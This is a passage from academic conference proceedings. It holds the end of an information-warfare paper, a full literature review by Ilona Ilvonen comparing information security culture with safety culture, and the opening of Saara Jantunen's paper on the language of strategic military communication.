see the same trend for evolution of western security needs and the military-industrial complex.
In this article I have tried to describe that the more electronic solutions we have created in a battle space,
the more rational the art of war still remains. The Vietnam War became a testing ground for electronic
warfare and automated command and sensor networks. Information warfare is also the reflection of all
our fantasies, dreams and wishful thinking. Not the least of which, the dream of invisibility, is formalised
by the possibility of acting in cyber(computer)space by masking our identity, by remaining elusive,
146

Aki-Mauri Huhtinen
untraceable and unidentifiable. Attackers use this capability. Absolute information control and dominance
is based on the idea of understanding everything and seeing beyond the horizon without being seen.
References
Allen, Patrick D. (2010) Information Operations Planning. Boston: Artech House.
Armitage, John. (2003a) ”Militarized Bodies: An Introduction”. Body & Society vol. 9;1, pp. 1-12.
Baudrillard, Jean. (2010) Carnival and Cannibal. Ventriloquous Evil. London: Seagull Books.
Baudrillard, Jean. (2005) The System of Objects. Translated by James Benedict. London: Verso.
Bergman, Mats. (2010) “Presentaatio vai representaatio? Charles S. Peircen perseptioteorian merkilliset vaiheet”.
Representaatio. Tiedon kivijalasta tieteiden työkaluksi, Tarja Knuutila & Aki Petteri Lehtinen (eds), Helsinki:
Gaudeamus. Helsinki University Press, pp. 75-94.
Boisot, Max H., MacMillian, Ian C., and Han, Kyeong Seok. (2007) Explorations in Information Space. Knowledge,
Agents, and Organisation. England: Oxford University Press.
Bousquet, Antoine. (2009) The Scientific Way of Warfare: Order and Chaos on the Battlefields of Modernity. London:
Hurst & Company.
Campen, Al. (1996) Cyberwar. Washington DC: AFCEA Press.
Campen, Al. (1992) The First Information Warfare: The Story of Computers and Intelligence Systems in the Persian
Gulf War. Washington DC:AFCEA International Press.
Czosseck, Christian and Geers, Kenneth (Eds.). (2009) The Virtual Battlefield: Perspectives on Cyber Warfare.
Amsterdam: IOS Press.
Ellul, Jacques. (1965) Propaganda. The Formation of Men’s Attitudes. Translated by Konrad Kellen and Jean Lerner.
New York: Alfred A. Knopf.
Friedman, Norman. (2009) Network-Centric Warfare. How Navies Learned to Fight Smarter through Three World
Wars. Annapolis: Naval Institute Press.
Gray, C.H. (2002) Cyborg Citizen: Politics in the Posthuman Age. London: Routledge.
Gray, Collin. (2007) Another Bloody Century: Future Warfare. London: Phoenix.
Hoskins, Andrew and O’Loughlin, Ben. 2010. War and Media. The Emergence of Diffused War. Cambridge: Polity
Press.
Kilcullen, David. (2009) The Accidental Guerilla. Fighting Small Wars in the Midst of a Big One. London: Hurst &
Company.
Krishnan, Armin. (2009) Killer Robots. Legality and Ethicality of Autonomous Weapons. Ashgate.
Lind, Williams. (2010) “The Power of Weakness”. In David, G. J.; McKeldin III, T.R. (2009, edit.) Ideas as Weapons.
Influence Perception in Modern Warfare. Washington D.C.: Potomac Books, pp. 35-38.
Palojärvi, Pia. (2009) A Battle in Bits and Bytes: Computer Network Attacks and the Law of Armed Conflict.
Publications of the Erik Castrén Insititute of International Law and Human Rights. University of Helsinki. The
Erik Castrén Research Reports 27/2009.
Peltoniemi, Mirva. (2009) Industry Life-Cycle Theory in the Cultural Domain: Dynamics of the Game Industry.
Tampere University of Technology, publication 805. (Dissermination).
NATO Military Concept for Strategic Communication” (15OCT2009). [Available at:
http://www.nato.int/shape/news/2009/12/091215a.html (07022011)].
Shaw, Martin. (2005) The New Western Way of War. Risk-Transfer War and its Crisis in Iraq. Cambridge: Polity
Press.
Stahl, Roger. (2010) Militainment, INC. War, Media, and Popular Culture. New York: Routledge.
Shimko, Keith L. (2010) The Iraq Wars and America’s Military Revolution. Cambridge University Press.
Soeters, Joseph, Paul C. van Fenema and Robert Beeres. (2010) “Introducing military organizations” Managing
Military Organizations. Theory and practice. Edited by Joseph Soeters, Paul C. van Fenema and Robert
Beeres. London: Routledge, pp. 1-14.
Strazzanti, Laura. (2009) Did the Media Sell War as a Product? The Case of the Iraq War 2001-2003. München:
Martin MeidenBauer Verlagsbuchhandlung.
Taylor, Philp. (2010) “The Limits of Military Information Strategies”. In David, G. J.; McKeldin III, T.R. (2009, edit.)
Ideas as Weapons. Influence Perception in Modern Warfare. Washington D.C.: Potomac Books, pp. 13-16).
Taylor, Philip. (2003) Munitions of the Mind: A History of Propaganda from the Ancient World to the Present Day.
Manchester University Press, 3rd edition.
Virilio, Paul. (2009) The Aesthetics of Disappearance. Translated by Philip Beitchman. Los Angels: Semiotext(e).
Virilio, Paul. (1989) War and Cinema. The Logistics of Perception. Translated by Patrick Camiller. London: Verso.
147

Information Security Culture or Information Safety Culture –
What do Words Convey?
Ilona Ilvonen
Tampere University of Technology, Tampere, Finland
ilona.ilvonen@tut.fi
Abstract: In the contemporary world of constantly changing information threats, information security culture is a
concept that many organizations should emphasize on. Many threats cannot be countered only with sophisticated
technical equipment. Instead, the attitudes and actions of employees gain significance each day, be the threat an
urge to leak company confidential documents to Wikileaks or to competitors, or willingness to help a ”colleague” with
an unconventional request. Information security culture is a concept widely accepted in the field of information
security research. It refers to the dominant understanding of how information security principles are manifested in the
daily operations of a company. The culture implies what kind of behaviour of the employees is acceptable and
encouraged. Literature about information security almost non-exceptionally uses the word security. However, in the
field of organizational safety culture, the word security has little use. What is different? Is preventing human or
material casualties really fundamentally different from preventing information casualties? This paper is triggered by
the curiosity of how different literature streams discuss culture, be it called safety culture or security culture. Also the
differences in approaches to security and safety are analysed. The term safety includes both the perspective of an
object being protected from threats and the perspective of that object not causing threats. The term security includes
only the perspective of an object being protected from threats. It is interesting to note, that both the words safety and
security appear in the definitions for the term security. In information security the focus is for many organizations on
the threats that come from outside the organization. This seems to justify the use of the word security. However, in
many cases the biggest threats to the information of an organization come from inside the organization. Also, many
organizations state that the information of customers is the most valuable to them and compromising customer
information would not only harm the organization itself, but also its stakeholders. This would justify the use of the
word safety in connection with information. This paper presents a literature review. The outcome of this paper is an
understanding of the differences and similarities of the concepts under stydy. Discussion on the meaning of
information security culture and implications to companies are presented.
Keywords: Information security, security, safety, information security culture, concept analysis, meanings
1. Introduction
Organizational culture is an area where a lot of research is conducted to understand the dynamics of
organizations and the way people behave in them. Over time approaches to the study of organizational
culture have varied from sociology to management (Denison 1996). Research approaches have varied
from ethnographies to action research and quantitative questionnaires (Denison 1996, Guldenmund
2007). In this paper organizational culture, specifically safety culture literature is contrasted to information
security culture literature. Although both share the same roots, there are also fundamental differences
between these fields.
Before safety and security culture as concepts can be further discussed, a brief look at the terms safety
and security is needed. In everyday language these terms are often used as synonyms. However, there
are some differences in the definitions of these terms.
Safety:
The condition of being protected from or unlikely to cause danger, risk, or injury
Denoting something designed to prevent injury or damage (Oxford Dictionary of English)
Security:
The state of being free from danger or threat
The safety of a state or organization against criminal activity such as terrorism, theft, or espionage
Procedures followed or measures taken to ensure the security of a state or organization
The state of feeling safe, stable, and free from fear or anxiety (Oxford Dictionary of English)
Based on these definitions, we can make the distinction that the term safety includes both the perspective
of an object being protected from threats and the perspective of that object not causing threats. The term
security includes only the perspective of an object being protected from threats.
148

Ilona Ilvonen
Literature about information security almost non-exceptionally uses the word security. However, in the
field of corporate safety culture, the word security has little use. Still in both frameworks the organization
can both be the target or the source of threats, although depending on the industry the proportions of
these two may vary. This paper is triggered by the curiosity of how different literature streams discuss
culture, be it called organizational culture, safety culture or security culture. The outcome of this paper is
an understanding of the differences and similarities of these concepts. In the following, first the concept of
organizational culture is examined. Then both safety culture and information security culture literature
streams are introduced. These streams are then compared and analyzed.
2. Organizational culture
Organizational culture is a concept that has emerged in scientific literature as early as in the 1950
(Guldenmund 2000, Denison 1996). The term however has really manifested itself in the scientific
literature in the early 1980’s (Paalumäki 2010). Before this most research has been done under the term
organizational climate. One approach to link these concepts together is to define organizational climate
as something that emerges from the organizational culture. (Guldenmund 2000) This means that
organizational climate reflects the organizational culture, which is a more embedded construct and more
difficult to research than organizational climate.
Guldenmund (2000) defines organizational culture having seven characteristics.
It is a construct rather than a concrete phenomenon.
It is relatively stable, i.e. it changes slowly over time.
It has multiple dimensions. These dimensions also vary depending on the researcher or author.
It is shared by groups of people, and it is holistic. This means that also the way the components or
levels of the culture construct the culture needs to be examined.
It consists of various aspects; this means that several, different cultures or climates can be
distinguished within an organisation, e.g. a service climate or a safety culture. These distinctions
have only been made for analytical or practical reasons to make the concept more tangible.
It has many layers, and the more ”superficial” the layer, the easier it is to change. Certain practices
can constitute a culture, which is in many cases learned, be it national culture or organizational
culture.
It is functional. A simple and well-known definition of culture reads, ``the way we do things around
here'', which effectively captures this functional aspect.
”Overall, organisational culture is a relatively stable, multidimensional, holistic construct
shared by (groups of) organisational members that supplies a frame of reference and which
gives meaning to and/or is typically revealed in certain practices.”(Guldenmund 2000)
According to Schein, organizational culture manifests itself on three levels: the level of artifacts, the level
of values and the level of beliefs (Schein 1984). The level of artifacts is the visible level of culture, which
is easy to examine, but hard to interpret. Other authors distinguish more layers in what Schein calls
artifacts (Guldenmund 2000). For example the office space and working materials of an organization can
be examined, but to understand the meaning of the office construction or the materials and instructions
can be difficult. For this understanding the values of the organization need to be examined. This can be
done by interviewing organization members and by analyzing the artifact contents. Even this analysis
however does not provide a full understanding on why organization members behave the way they do. To
gain true insight into the culture the level of assumptions and understandings needs to be examined.
Many authors mention organizational stories as one layer or element of the organizational culture
(Guldenmund 2000). Although organizations are unique, there are typical stories that present themselves
with small variations across different organizations. These stories can be either positively or negatively
oriented. Positive stories depict heroes that have somehow saved the organization, overcome
exceptional struggles or showed unexpected devotion to the organization. Negative stories depict
situations, when management doesn’t follow guidelines or acts unreasonably. (Martin et al. 1983)
These stories represent a way how each organization can distinguish itself from the others. Although
similar in structure, each story is unique in how it represents the culture of the company it is born from.
(Martin et al. 1983) An interesting viewpoint to organizational stories is to contrast them to Scheins levels
of organizational culture. An organizational story can be an artifact (Schein 1984) in case it is written in
149

Ilona Ilvonen
an explicit form and in one way or another distributed through the organization. Many success stories are,
or could be, used as artifacts to help people identify themselves with the organization. Negative stories
however do not necessarily appear in an explicit form. If they are spread as word of mouth, are they
artifacts? Rather, they are on the level of values, they convey the way for example how the management
follows the explicit values of the company.
Figure 1: The levels of organizational culture (applied from Schein 1984)
3. Safety culture
Similar to organizational culture, safety culture research has begun as safety climate research (Clarke
2000). Safety climate scores were expected to reflect the accident rates in companies, since the safety
climate works as a frame of reference for employee behaviour (Zohar 1980 in Grote 2007). This means
that also in safety culture the safety climate is seen to reflect the underlying safety culture, as illustrated
in Figure 2. Cooper (2000) defines safety culture as sub-culture of the organizational culture, unless an
organization acts in a high-risk industry which would make safety culture the dominant culture in the
organization. Safety culture however is not homogenous throughout a company. Different departments
and teams may have their own conceptions about priorities for example between safety and production.
Priorities vary according to risk profiles, but these differences lead to differences in the safety cultures
across the organization.(Cooper 2000)
Observable
Underlying
Artifacts & Creations
Technology
Art
Visible & audible behavior
patterns
Values
Basic assumptions
Relationship to environment
Nature of reality, time &
space
Nature of human nature
Nature of human activity
Safety culture
Safety climate
Figure 2: Relation between safety culture and safety climate
150
Visible but often not
decipherable
Greater level of
awareness
Taken for granted
Invisible
Preconscious

Ilona Ilvonen
Grote (2007) sheds a new light to the discussion of safety culture often considered quite superficially as
safety-promoting norms and attitudes shared by the members of an organization. According to Grote a
positive safety culture means centralized values and norms that work as a strong basis for choices that
people make when they work autonomously and in a decentralized manner. Culture is seen more as a
means to provide sufficient coordination and integration of otherwise autonomous agents than as the
general assurance of safety as a core value. (Grote 2007) The notion of Cooper that each department
may end up with a different safety culture is countered by the approach, that key values and norms need
to be actively driven in the organization, so that they build a homogenous basis for the different safety
cultures.
Up to this point this paper has dealt mainly with different approaches and definitions to the concepts at
hand. However interesting, these definitions don’t address much how a positive and beneficial safety
culture is achieved. Measuring the elements of a safety culture is tricky since culture is a complex
construct that has many elements that are difficult to measure. The organization creates safety, and this
is only one aspect of its actions. By understanding the operations of an organization the safety needs
can be more precisely defined. If there are multiple goals, these goals can contradict the safety goals
(Reiman & Oedewald 2010).
Measuring the effectiveness of safety culture is more easily said than done. One measure commonly
used is the accident and incident rate. There is however one big risk connected with this measure:
Accidents and incidents get hidden. The accident rate tells about the safety culture, but also of the ability
of employees to hide minor accidents. If it was not reported, it never happened. This kind of attitude does
not foster a proactive safety culture, which benefits from all information about accidents, incidents and
near misses. One factor of a safety culture is the communication and use of safety incident information
(Díaz-Cabrera et al. 2007). A simple and common sense based way of interpreting this factor is, that if
safety reporting is really used for improvement and employees participate in the analysis and
improvement efforts, they are motivated to report safety incidents. In some organizations the managers
and workers may have very different understandings about safety (Harvey et al. 2001), which may lead to
the situation where employees feel management is only interested in the safety report numbers, not the
phenomena behind them.
”Organizations are defined by what they ignore - ignorance that is embodied in assumptions – and by the
extent to which people in them neglect the same kind of considerations” (Weick 1998 in Reiman &
Oedewald 2010). Safety is always something that is defended against recognized risks. Organizations
need to be humble and admit that all risks can never be recognized. The actions should be directed at
recognizing risks as early as possible. A good safety culture maintains a healthy humble attitude
throughout the organization. To achieve this, the previously mentioned measurements need to support
the safety culture.
4. Information security culture
According to Martins & Eloff (2002) information security culture refers to the dominant understanding of
how information security principles are manifested in the daily operations of a company. The culture
implies what kind of behaviour of the employees is acceptable and encouraged. (Martins & Eloff 2002)
von Solms (2000) agrees to a great extent with the previous definition. According to him, the information
security culture has to support the instructions and procedures of the organisation so that information
security will become a natural part of daily routines (von Solms 2000). According to both of these
sources, information security culture can also be consciously developed by directing employee behaviour
in the desired direction. Schlienger & Teufel (2003) also have a somewhat similar approach to the
concept. According to them, information security culture contains all the socio-cultural methods that
support technical information security. Through the implementation of them information security becomes
a part of daily operations. (Schlienger & Teufel 2003) These definitions show that information security
culture, contrary to safety and organizational culture research, is not directly born from information
security climate research.
Information security culture is a relatively new concept and definitions for it do not vary much. The
definition of the concept is complicated by the use of relating terms. Information security awareness
(Siponen 2000, Tsohou et al. 2008) and information security obedience (Thomson et al. 2006) are
examples of terms with parallel definitions. Making a clear distinction from the concept security culture is
difficult, for example Ruighaver et al.( 2007) and Schlienger & Teufel (2003) the use term security culture
to mean roughly the same as the others mean by the term information security culture.
151

Ilona Ilvonen
All of the previous sources are connected by the approach that information security culture intensifies the
implementation of technical information security initiatives. According to them a good information security
culture encourages the employees to obey security instructions because they understand the reasons for
them. However, Ruighaver et al. (2007) have a different view. According to them, this kind of approach
limits the information security culture to only a small part of information security and furthermore, confirms
an old belief according to which information security is mostly a technical issue. They emphasise that
information security is mainly a concern of the top management. The information security culture reflects
the degree of success of management in addressing this concern. This is why the authors underline that
an attempt should not be made to create an information security culture. Instead, the tools and policies of
the company should be adapted to the dominant information security culture (Ruighaver et al. 2007). This
approach reflects the fact that it is much easier to affect the procedures and tools than the culture.
However, the authors do not fully address the situation of having a poor security culture and how to deal
with it.
Information security culture is examined, similar to safety culture, mainly through employee attitudes and
behaviour. Still some authors emphasize that there are deeper layers to information security culture than
just the layer of behaviour and attitudes, which is a similar notion to safety culture.
5. Security culture and safety culture - insights
When the previous sections on safety culture and information security culture are compared, an
interesting notion can be made: the definitions for the concepts do not differ significantly. Information
security culture definitions emphasize a little more the role of instructions and procedures than safety
culture definitions, but this difference is not fundamental. A similarity between all of the sources cited in
this paper is, that not much consideration is given to the terms security, safety or culture. The meaning of
these terms is taken for granted, and the only concept in need of definition is the construct of the terms:
safety culture or security culture. This in spite the fact that the term culture or organizational culture does
not have a single definition that could be assumed is known and agreed upon by the readers, as
introduced in the second section. Also the meaning of the words safety or security is not discussed.
The main differences of these literature streams is the industries the applications and research are done
in. Safety research tends to focus on industries with high risks, e.g. nuclear industry, traffic or healthcare
(e.g. (Grote 2007, Harvey et al. 2001, Glendon & Stanton 2000). In these industries the biggest risks are
involved with threats of human casualties, either to the employees or to customers or people in general.
Information security literature is in many cases written from the viewpoint of information –intensive
organizations, but the industry range is not as specific as in safety culture literature. The implicit
differentiation in the use of the words safety and security seem to be that safety deals with risks that
involve the potential of material or human casualties, which are caused by the actions of people within
the organization. Security is connected to threats that come from outside the organization, in the
mentioned industries e.g. terrorism is such a threat.
If this differentiation is taken to the immaterial world of information, both elements of safety and security
are present. There are many elements in information security that do not deal with an outside threat,
rather many information security compromises can be recognized as accidents within the company.
Information safety would be the concept that addresses these threats. These different approaches are
contrasted in Table 1.
Table 1: The meanings of security and safety in different environments
Term ”traditional” environment Information environment
Safety The protection against human or material
casualties caused from within the
organization
Security The protection against human or material
casualties caused from outside the
organization
The protection against information loss or
damages caused from within the organization
The protection against information loss or
damages caused from outside the organization
The benefit of the distinction between information security and information safety would be that the
internal threats and external threats would get equal consideration. Today the emphasis tends to be on
external threats and the technical protection mechanisms (Siponen 2000, von Solms & von Solms 2004).
In today’s world security culture does not need much emphasis. Terrorist threats, information leaks, and
the like are very much on the minds of all nations, organizations and individuals. Safety culture on the
152

Ilona Ilvonen
other hand might need more effort. Danger from within is more difficult to recognize, because when
people get used to the environment they act in, they get blind sighted by habit (Taleb 2008). What once
was a safe action may change into an unsafe action due to the changed circumstances. A positive safety
culture requires active spotting of potential threats, be it technical failures, human error or intentional
breaking of the instructions.
6. Conclusions
As seen in the previous section, the terms safety and security are taken for granted in the literature that
uses them. The conscious examination of what safety culture and security culture mean could benefit
companies in the context of information and knowledge. In information security the threats are
traditionally seen to originate from outside the organization. From the culture perspective this means that
there is a shared belief in the organization that the main threats to information come from outside. An
information safety culture viewpoint would complement this by adding the internal perspective. The safety
perspective of the organization not harming others is also relevant in the context of information and
knowledge, as can be seen for example from the contemporary case of Wikileaks. The information that
was leaked from US government agencies did not only harm these agencies, but caused problems to
various other actors.
Organizational culture is defined to be a complex construct with multiple layers and aspects to it. As subcultures
security culture and safety culture are as well complex and deserve appropriate attention. The
attempts to measure safety or security culture with one-dimensional measures has not provided with the
desired results. This should lead to appreciation of the complexity and multidimensionality of the cultures,
and to profound consideration on what layers of the culture are possible to measure and affect. After that
the employees of the organization can be empowered to promote the safety and security of the
organization in many aspects, health as well as information.
This paper is linked to the doctoral dissertation work of the author, which includes conceptual analysis of
knowledge security. The dissertation is situated in between the fields of knowledge management and
information security, and the literature researched for this paper triggers interesting perspectives to the
dissertation topic. Especially in connection to knowledge that is embedded in the employees of a
company, both the security and safety aspects would need to be considered.
References
Clarke, S. 2000, "Safety culture: under-specified and overrated?", International Journal of Management Reviews, vol.
2, no. 1, pp. 65-90.
Cooper, M.D. 2000, "Towards a model of safety culture", Safety Science, vol. 36, no. 2, pp. 111-136.
Denison, D.R. 1996, "What is the Difference between Organizational Culture and Organizational Climate? A Native's
Point of View on a Decade of Paradigm Wars", The Academy of Management Review, vol. 21, no. 3, pp. pp.
619-654.
Díaz-Cabrera, D., Hernández-Fernaud, E. & Isla-Díaz, R. 2007, "An evaluation of a new instrument to measure
organisational safety culture values and practices", Accident Analysis & Prevention, vol. 39, no. 6, pp. 1202-
1211.
Glendon, A.I. & Stanton, N.A. 2000, "Perspectives on safety culture", Safety Science, vol. 34, no. 1-3, pp. 193-214.
Grote, G. 2007, "Understanding and assessing safety culture through the lens of organizational management of
uncertainty", Safety Science, vol. 45, no. 6, pp. 637-652.
Guldenmund, F.W. 2000, "The nature of safety culture: a review of theory and research", Safety Science, vol. 34, no.
1-3, pp. 215-257.
Guldenmund, F.W. 2007, "The use of questionnaires in safety culture research – an evaluation", Safety Science, vol.
45, no. 6, pp. 723-743.
Harvey, J., Bolam, H., Gregory, D. & Erdos, G. 2001, "The effectiveness of training to change safety culture and
attitudes within a highly regulated environment", Personnel Review, vol. 30, no. 6, pp. 615-636.
Martin, J., Feldman, M.S., Hatch, M.J. & Sitkin, S.B. 1983, "The Uniqueness Paradox in Organizational Stories",
Administrative Science Quarterly, vol. 28, no. 3, Organizational Culture, pp. pp. 438-453.
Martins, A. & Eloff, J.H. 2002, "Information Security Culture", In Security in the information society IFIP/SEC2002
Kluwer Academic Publishers, Boston, pp. 203.
Paalumäki,A. (2010) Organisaatiokulttuuri tutkimusalueena, TTY Turvallisuuskulttuuriseminaari, 23.11.2010.
Reiman,T. & Oedewald,P. (2010) Turvallisuuskulttuuri osana organisaatiokulttuuria, TTY
Turvallisuuskulttuuriseminaari 23.11.2010.
Ruighaver, A.B., Maynard, S.B. & Chang, S. 2007, "Organisational security culture: Extending the end-user
perspective", Computers & Security, vol. 26, no. 1, pp. 56-62.
Schein, E. 1984, "Coming to a New Awareness of Organizational Culture", Sloan Management Review, vol. 25, no.
2, pp. 2-16.
153

Ilona Ilvonen
Schlienger, T. & Teufel, S. 2003, "Analyzing information security culture: increased trust by an appropriate
information security culture", Proceedings of the 14th International Workshop on Database and Expert Systems
Applications, pp. 405.
Siponen, M. 2000, "A conceptual foundation for organizational information security awareness. ", Information
Management & Computer Security, vol. 8, no. 1, pp. 31-41.
Taleb, N.N. 2008, The Black Swan - the impact of the highly improbable, Penguin, London 366 p.
Thomson, K., von Solms, R. & Louw, L. 2006, "Cultivating an organizational information security culture", Computer
Fraud & Security, vol. 2006, no. 10, pp. 7-11.
Tsohou, A., Kokolakis, S., Karyda, M. & Kiountouzis, E. 2008, "Investigating Information Security Awareness:
Research and Practice Gaps", Information Security Journal: A Global Perspective, vol. 17, no. 5, pp. 207-227.
von Solms, B. 2000, "Information Security - The Third Wave? ", Computers & Security, vol. 19, pp. 615-620.
von Solms, R. & von Solms, B. 2004, "From policies to culture", Computers & Security, vol. 23, no. 4, pp. 275-279.
154

Strategic Communication and Revolution in Military Affairs:
Describing Actions and Effects
Saara Jantunen
National Defence University, Helsinki, Finland
sijantunen@gmail.com
Abstract: Changes in the concept or war are reflected by descriptions of military action. This article introduces a
parameter system for analyzing strategic communication, which points out the division of military communication into
tactical-operational and strategic levels. The system includes the parameter of legitimity - whether an action is
legitimate warfare or not. Second, it contains the good/bad parameter, which is manifested by the old tradition of
glorification and demonization in war rhetoric. The focus of this paper is on discussing the third parameter: the
exclusive parameter. It determines whether certain behavior is exclusive for 'us' or 'the other', and is often our only
cue to deciding what is strategic communication, and functions on the strategic level. This approach links linguistics
to strategy studies.
Keywords: strategic communication, linguistics, RMA
1. Introduction
The legitimacy of warfare is one of the key themes in news reporting in the 21st century. During the war
in Iraq, the Pentagon has been eager to remind the audience how committed they are to the Geneva
conventions and the rules of war. The legitimacy of the war has been questioned, and depending on who
is asked, the war may be called either a liberation operation, an attack, an invasion or humanitarian
intervention.
The prototype of a war is a battle that follows certain rules and norms, and where the warwaging parties
are entitled to a defined selection of actions, such as attacking and defending, communicating and
reconnoitering. These are terms that are associated with war and skills that are taught in every military
academy.
Information warfare, however, speaks of both own and enemy action very differently. War crimes set
aside, the enemy typically behaves in an immoral or cowardly way, as the enemy is demonized and 'self'
is glorified. The hotter the battle, the less the adversary acts like a legitimate military force: terms such as
terrorize, brutalize and kill women and children enter the lexicon.
In other words, military discourse has different parameters. First there is, as discussed above, the
parameter of legitimity - whether an action is legitimate warfare or not. Then, there is the good/bad
parameter, which is manifested by the tradition glorification and demonization in war rhetoric. This paper
focuses on discussing the third parameter: the inclusive/exclusive parameter. This parameter determines
whether certain behavior is inclusive or exclusive behavior for 'us' or 'the other'. It, as will be argued, is a
cue to distinguishing rhetoric with strategic motives from other communication.
The descriptions of Action and Effects symbolize the current concept of warfare. Strategy has to be
converted into communication. Action descriptions, the core of language (Halliday, 2004), have an
important role in the narratives of warfare, where actions speak louder than words. As the nature of war
evolves, the changes are reflected by language - in this case by the language of strategic
communication.
2. 'New war': Revolution in Military Affairs and the Grand Military Narrative
The Revolution in Military Affairs (RMA) is to military affairs what industrial revolution was to 19th century
society. The evolution of technology has created a world of efficiency and speed. In warfare, this
evolution is represented by concepts such as stealth technology, drones, new precision munitions and
cyber warfare. The RMA is described as "a higher-tech, information-based type of warfare" which "will
take a force that is smart and well educated, one that is comfortable with technology and can think
critically" (Pang, 1997). In order to finance the RMA, another revolution was needed: the revolution in
business affairs. The use of the term revolution (instead of evolution) emphasizes the active efforts in
decisionmaking and the objectives of the military industry, and the effects of the revolution in the private
sector (through contractor agreements) can be seen in the business world. This 'revolution' affects the
entire society.
155

Saara Jantunen
The Revolution in Military Affairs has manifested its essence in the Gulf War, Kosovo, Iraq and
Afghanistan. These wars have demonstrated the technological gap between the adversaries. The lower
end of this gap has been given multiple roles in the Grand Military Narrative, where it is referred to as
terrorism or asymmetric warfare. What comes to cyberspace, the constant debates on the advancement
of potential adversaries and the state of national cyber security keep cyber warfare high on the list of
priorities.
The tradition of Grand Military Narrative stems from the industrial age identity. Technology symbolises
manmade evolution and is in the service of virtue. The possessors of technology make their own destiny.
The Grand Military Narrative presents technology as a solution and prerequisite.
In warfare, this is manifested by concepts such as Effects Based Operations and the Comprehensive
Approach. High-tech weapons are 'precise' and 'reduce collateral damage and civilian casualties' and
help to rid the world of the 'bad guys'.
What makes this war 'new' is its spread to domains which have traditionally been seen as civilian. The
military-industrial complex has resulted in the presence of companies such as Blackwater (or Xe) in Iraq,
in civilian weapons manufacturers benefiting from the ongoing conflicts, and in military presence in
entertainment and education. Technology is part of American ideal of 'easy living' as it maximises output
and minimizes input (citing Lyotard, 1984 in Rantapelkonen, 2006:73). Companies such as Raytheon
develop exoskeleton suits that turn an overweight teenager into a human/terminator crossover
(Raytheon, 2010). In the US, the military recruits from shopping malls by inviting the youth to play war
with (Pentagon funded) computer games under the supervision of army recruiters (McLeroy, 2007). High
school kids and college students are offered a chance to "earn respect", "get noticed by a nationwide
cybersecurity community" and "help the U.S. beat the bad guys" by attending a "cyber challenge"
competition (US Cyber Challenge, 2010). These projects all demonstrate the trend in the (r)evolution of
warfare. Warfare symbolizes technology and distance, the "disappearance" (Virilio, 2009). Lyotard argues
that technology is “good” because it is efficient, not because it is “true”, “just” or “beautiful” (citing Lyotard,
1984, in Rantapelkonen, 2006:73)
The (r)evolution has thus created a gap between the adversaries, which has brought about the paradox
in the attitudes towards technology. On one hand, there is the desire to develop technological capability,
be able to wage war from a distance, possibly anonymously, combine effects with minimal effort, and to
to achieve minimal physical presence in the battle field. These trends are argued with certain threat
scenarios, such as global terrorism or the cyber capability of the adversary. On the other hand, these
developments create a distance between the warwaging parties - asymmetry. The US is combating
against roadside and suicide bombings and cyber attacks, which are easy and cheap for the attacker to
realize, and difficult to defend against. The American response to this is deterrence:
We must tailor deterrence to fit particular actors, situations, and forms of warfare. The same
developments that add to the complexity of the challenge also offer us a greater variety of
capabilities and methods to deter or dissuade adversaries. This diversity of tools, military
and non-military, allows us to create more plausible reactions to attacks in the eyes of
opponents and a more credible deterrence to them. In addition, changes in capabilities,
especially new technologies, permit usto create increasingly credible defenses to convince
would-be attackers that their efforts are ultimately futile. (2008 National Defense Strategy)
This is the Grand Military Narrative. Technology is both a threat and a solution: it creates the gap
between the rich, hi-tech 'us' and the poor, low-tech 'them'. The American response to this threat is
deterrence - in the form of technology. In military discourse the 'new war' is present in technologycentered
descriptions of Action and Effects, discussed in the next chapter
3. Strategic communication: The battle of narratives
NATO defines strategic communication as
the coordinated and appropriate use of NATO communications activities and capabilities -
Public Diplomacy, Public Affairs (PA), Military Public Affairs, Information Operations (Info
Ops) and Psychological Operations (PSYOPS), as appropriate - in support of Alliance
policies, operations and activities, and in order to advance NATO’s aims (Simon and
Duzenli, 2009)
156

Saara Jantunen
Instead of white, grey and black propaganda we now have strategic communication, a combination of
public diplomacy (state/political level), public affairs (media) and information operations (military),
previously also referred to as perception management (Taylor, 2003). Strategic communication is the
vehicle for positive narratives that win the hearts and minds.
In US strategy, the need for the battle of narratives is recognized:
Dominating the narrative of any operation, whether military or otherwise, pays enormous
dividends. Failure to do so undermines support for policies and operations, and can actually
damage a country’s reputation and position in the world. In the battle of narratives, the
United States must not ignore its ability to bring its considerable soft power to bear in order
to reinforce the positive aspects of Joint Force operations. Humanitarian assistance,
reconstruction, securing the safety of local populations, military-to-military exercises, health
care, and disaster relief are just a few examples of the positive measures that we offer.
(United States Joint Forces Command, 2010)
In other words, the American military should be associated with positively evaluated narratives. Like the
Comprehensive Approach that recognizes the need for both military and non-military resources in
operations, strategic communication draws from the same resources:
The complexity of the future suggests that the education of senior officers must not remain
limited to staff and war colleges, but should extend to the world’s best graduate schools.
Professional military education must impart the ability to think critically and creatively in both
the conduct of military operations and acquisition and resource allocation. The Services
should draw from a breadth and depth of education in a range of relevant disciplines to
include history, anthropology, economics, geopolitics, cultural studies, the ‘hard’ sciences,
law, and strategic communication. (United States Joint Forces Command, 2010)
Strategic communication manifested by the battle of narratives creates the need for discourse patterns
and evaluation that "reinforce the positive aspects" of military operations. "At the end of the day, it is the
perception of what happened that matters more than what actually happened. (United States Joint Forces
Command, 2010)"
In addition to narratives, the structures of language convey evaluations. Sometimes unfavourable
decisions have to be made and actions taken. This inconvenience is coded in linguistic structure. As
Lukin (2005: 6-7) argues, military operations are often described as having no scope: 'operations are
conducted' as if the action was muted without mention of the target of the action. Further, the lexical
choices reflect the abstraction of military discourse:
Note the use of words like ‘operations’ and ‘actions’, or verb forms like ‘operating’, ‘doing’,
and ‘conducting’, which are highly generalized terms covering for a whole range of more
specific processes. So when General Franks says Our coalition special operations forces
continue their actions throughout all of Iraq, this allows him to generalize away from the
specific actions of ‘attacking’, ‘destroying’, ‘killing’, ‘wounding’, etc. (Lukin, 2005: 7)
Strategic communication would not report the enemy to 'conduct operations' or 'continue to move'.
Instead, the enemy action would typically be lexicalized with more concrete, high modality action
descriptions. Language is ideological, and strategic communication uses it to advance its cause.
These action descriptions are in the very core of strategic communication. According to Foucault (2010:
105), the verb serves the function of affirmation: it declares that the person using the verb not only
understands the names of things but ecaluates them. Halliday's functional language theory shares this
view and emphasizes Action as the core of language (see Halliday, 2004).
4. Actions and effects
In military discourse Actions are often represented by descriptions of Effects, which emphasize the end
state. In this paper these Effects are divided into two groups, kinetic (physical) or informational.
Table 1 presents a list of Information Operations Effects, but as can be noticed, many of the descriptions
are also used in conventional warfare:
157

Saara Jantunen
Table 1: "Sample IO desired effects compiled from various sources" (as presented in Allen, 2005: 75)
Access Diminish Mislead
